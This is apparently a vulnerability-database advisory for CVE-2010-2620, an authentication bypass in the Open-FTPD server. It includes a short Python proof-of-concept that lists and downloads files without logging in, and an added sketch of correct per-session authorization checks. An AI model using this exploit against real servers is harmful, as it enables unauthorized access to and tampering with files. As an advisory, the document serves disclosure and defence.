Open-FTPD Multiple Authorization Vulnerabilities

Vulnerability ID 1119516 Vulnerability type Authorization issue
Published 2010-06-18 Updated 2013-08-13
CVE ID CVE-2010-2620 CNNVD-ID CNNVD-201007-024
Platform Windows CVSS score 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/13932
https://www.securityfocus.com/bid/41479
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201007-024
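|Vulnerability details
Open&Compact FTP Server is a small FTP server. Open-FTPD 1.2 and earlier versions contain an authentication bypass vulnerability. Without logging in, an attacker can gain elevated privileges by submitting malicious (1) LIST, (2) RETR, (3) STOR and other commands.
|Exploit (EXP)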
#!/usr/bin/env python3
# Exploit Title: Open&Compact Ftp Server <= 1.2 Full System Access
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

# Simply by omitting the login process to the open ftp server it is possible
# to execute any command, including but not limited to: listing files,
# retrieving files, storing files.
# Below is an example of a few commands.
# If you want to test storing files with no authentication, create a
# test file and uncomment the lines with the ftp.storbinary function call.

# Any command will work as long as there is at least one user who has the
# permission to execute that command. For example, storing files will work
# as long as there is one user with write permission. No matter who it is.

import ftplib

# Connect to server (active mode, as in the original test setup)
ftp = ftplib.FTP("127.0.0.1")
ftp.set_pasv(False)

# Note that we need no authentication at all!! (ftp.login() is never called)

# retrlines() prints the listing itself; the server's final reply is printed here
print(ftp.retrlines('LIST'))

# Download a file; the with-block closes the local copy once the transfer ends
with open('changelog.txt', 'wb') as out:
    print(ftp.retrbinary('RETR changelog.txt', out.write))

# filename = 'test.txt'
# f = open(filename, 'rb')
# print(ftp.storbinary('STOR ' + filename, f))
# f.close()

ftp.quit()
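The missing check, as an added sketch that is not Open-FTPD's code and not part of the original advisory: `vulnerable_allows` models the behaviour described above (a command passes if any account holds the permission), while `Session.handle` judges each command against the session's own login state and permissions. The account table, names and passwords are constructed for illustration.

```python
import hmac

# Constructed accounts for illustration; all names here are hypothetical.
USERS = {
    "alice": {"password": "constructed-pw-1", "perms": {"read", "write"}},
    "bob": {"password": "constructed-pw-2", "perms": {"read"}},
}
NEEDS = {"LIST": "read", "RETR": "read", "STOR": "write"}


def vulnerable_allows(verb):
    """Flawed model: ignores the session, passes if ANY account has the permission."""
    need = NEEDS.get(verb.upper())
    return any(need in acct["perms"] for acct in USERS.values())


class Session:
    """Per-connection state: commands are judged against this session's user only."""

    def __init__(self):
        self.pending = None  # name sent with USER, awaiting PASS
        self.user = None     # set only after a successful PASS

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.pending, self.user = arg, None  # re-login drops old identity
            return "331 Password required"
        if verb == "PASS":
            acct = USERS.get(self.pending)
            ok = acct is not None and hmac.compare_digest(
                arg.encode(), acct["password"].encode())
            self.user, self.pending = (self.pending if ok else None), None
            return "230 Logged in" if ok else "530 Login incorrect"
        if verb == "QUIT":
            return "221 Goodbye"
        if self.user is None:  # the gate the vulnerable server lacks
            return "530 Not logged in"
        need = NEEDS.get(verb)
        if need is None:
            return "502 Command not implemented"
        if need not in USERS[self.user]["perms"]:
            return "550 Permission denied"
        return "150 Opening data connection"
```

A server answering LIST, RETR or STOR with anything other than 530 before a 230 reply has been sent on that connection shows the behaviour this advisory describes.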
|Affected products
Open-FTPD Open-FTPD 1.2
|References

Source: EXPLOIT-DB
Name: 13932
Link: http://www.exploit-db.com/exploits/13932
Source: SECUNIA
Name: 40284
Link: http://secunia.com/advisories/40284